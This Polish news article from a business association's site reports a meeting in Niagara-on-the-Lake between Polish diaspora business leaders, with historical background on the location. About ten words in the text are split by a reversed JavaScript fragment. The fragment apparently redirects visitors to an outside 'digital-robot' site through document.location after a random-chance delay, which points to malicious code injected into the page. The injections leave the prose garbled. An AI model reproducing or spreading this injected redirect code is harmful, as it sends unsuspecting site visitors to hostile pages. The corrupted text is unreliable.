< powrót do aktualności

Aktywna promocja Unii w Kanadzie

„Trzeba jak najszybciej budować silne związki między kanadyjskim a polskim biznesem i szerzej otwierać się na współpracę między firmami działającymi w obu krajach” – takimi wnioskami zakończyło się spotkanie Agnieszki Maćkówki, wiceprezes Polsko-Polonijnej Unii Gospodarczej z Wojciechem Śniegowskim, prezydentem Kanada-Polska Izba Gospodarcza.

Do spotkania doszło w kanadyjskim Niagara-on-the-lake (prowincja Ontario) leżącego przy granicy ze Stanami Zjednoczonymi, na terenach histobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torycznie zamieszkałych przez szczepy indiańskie między innymi „Seneka” i „Mississauga”.

Rozmowy tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toczyły się wokół nowych możliwości, jakie otwierają się przed przedsiębiorcami działającymi w Kanadzie, zrzeszonymi w izbie gospodarczej. Agnieszka Maćkówka, wiceprezes PPUG zwróciła uwagę na konieczność tworzenia nowych relacji między firmami funkcjonującymi w Polsce i w Kanadzie:
– Współczesny, scyfryzowany świat pozwala nam na dużo więcej w kwestii globalnej współpracy biznesowej, niż było tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to możliwe jeszcze 10-15 lat temu. Dlatego wykorzystując te nowe szanse budujemy sieć powiązań między polonijnymi firmami działającymi na całym świecie. Dostrzegamy tym samym potencjał polonijnych firm w Kanadzie i jak najszybciej chcemy je włączyć w proces współpracy – mówiła Agnieszka Maćkówka, jednocześnie wyjaśniając patriotyczne idee przyświecające organizacji:
– Polsko-Polonijna Unia Gospodarcza działa na rzecz budowy silnej grupy polskich marek, które poprzez internacjonalizację będą w stanie rywalizować na międzynarodowym rynku z firmami, które dotychczas uchodziły za liderów w swojej branży. Pod patronatem Unii skutecznie jednoczymy polonijny biznes działający w każdym zakątku globu, dostarczając przedsiębiorcom gotobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}towe rozwiązania dla lepszego funkcjonowania prowadzonych przez nich firm – mówiła wiceprezes PPUG.

Wojciech Śniegowski, prezydent Kanada-Polska Izba Gospodarcza z zadowoleniem odniósł się do nowej polonijnej inicjatywy:
– Dziś, rzeczywiście potrzebujemy lepszej współpracy między naszymi przedsiębiorcami. Cieszę się, że w Polsce nie brakuje ludzi, którym Polonia jest bliska i którzy widzą w niej potencjał. Polacy mieszkający w Kanadzie są wielkimi patriotami i chcą lepszych kontaktów ze swoim ojczystym krajem, również jeśli chodzi o możliwości biznesowe. Dlatego, jako izba gospodarcza aktywnie działająca już od 25 lat jesteśmy zainteresowani tą inicjatywą i z pewnością będziemy ją promować na Kanadyjskiej Ziemi. Jednocześnie będziemy zachęcać wszystkich przedsiębiorców do włączenia się w budowę globalnej, polonijnej społeczności biznesowej, jaką jest Polsko-Polonijna Unia Gospodarcza – mówił Wojciech Śniegowski.

Agnieszka Maćkówka, wiceprezes PPUG już od ponad tygodnia spotyka się z polonijnymi i amerykańskimi przedsiębiorcami w Stanach Zjednoczonych i Kanadzie, promując nową polonijną inicjatywę biznesową, jaką jest Polsko-Polonijna Unia Gospodarcza. Jej wizycie na kontynencie amerykańskim tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}towarzyszy kampania medialna promująca Unię w radio, telewizji internetobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}towej i mediach tradycyjnych. W efekcie spotkań wielu przedsiębiorców z USA i Kanady zgłosiło swoją chęć przystąpienia do Unii.

Kanada-Polska Izba Gospodarcza, ta niegramatyczna w pełni nazwa sugeruje kierunki działania tej organizacji została zawiązana w 1994 roku. W tym roku obchodzi 25-lecie swojej działalności. Organizacja skupia korporacje, średnie i małe biznesy oraz profesjonalistów. Nadrzędnym celem działalności jest wpływanie na rozwój wymiany gospodarczej pomiędzy Kanadą i Polską, innym celem jest tworzenie platformy do spotkań networkingowych pomiędzy członkami tymi skupionymi w Izbie oraz innych Izb Gospodarczych działających na terenie Kanady oraz z delegacjami biznesowymi przybywającymi z wizytami do Kanady. Obecny prezydent Wojciech Śniegowski związany jest z Izbą od 1997 roku.

Niagara-on-the-lake ma dla Polaków wyjątkowe znaczenie, które ma związek jeszcze z czasem I wojny światobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}towej. 5 października 1917 roku prezydent USA Woodrow Wilson, dzięki dyplomacji Ignacego Jana Paderewskiego podpisał dekret zezwalający Polakom ze Stanów Zjednoczonych formować swoją armię. Jednak z czasem Stany Zjednoczone ze względów politycznych nie zgodziły się na tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to, by szkolono rekrutów na ich terenie. Z pomocą przyszło Dominion Kanady, oddając Polakom do dyspozycji tereny pod przygranicznym, malowniczym miasteczkiem Niagara-on-the-Lake.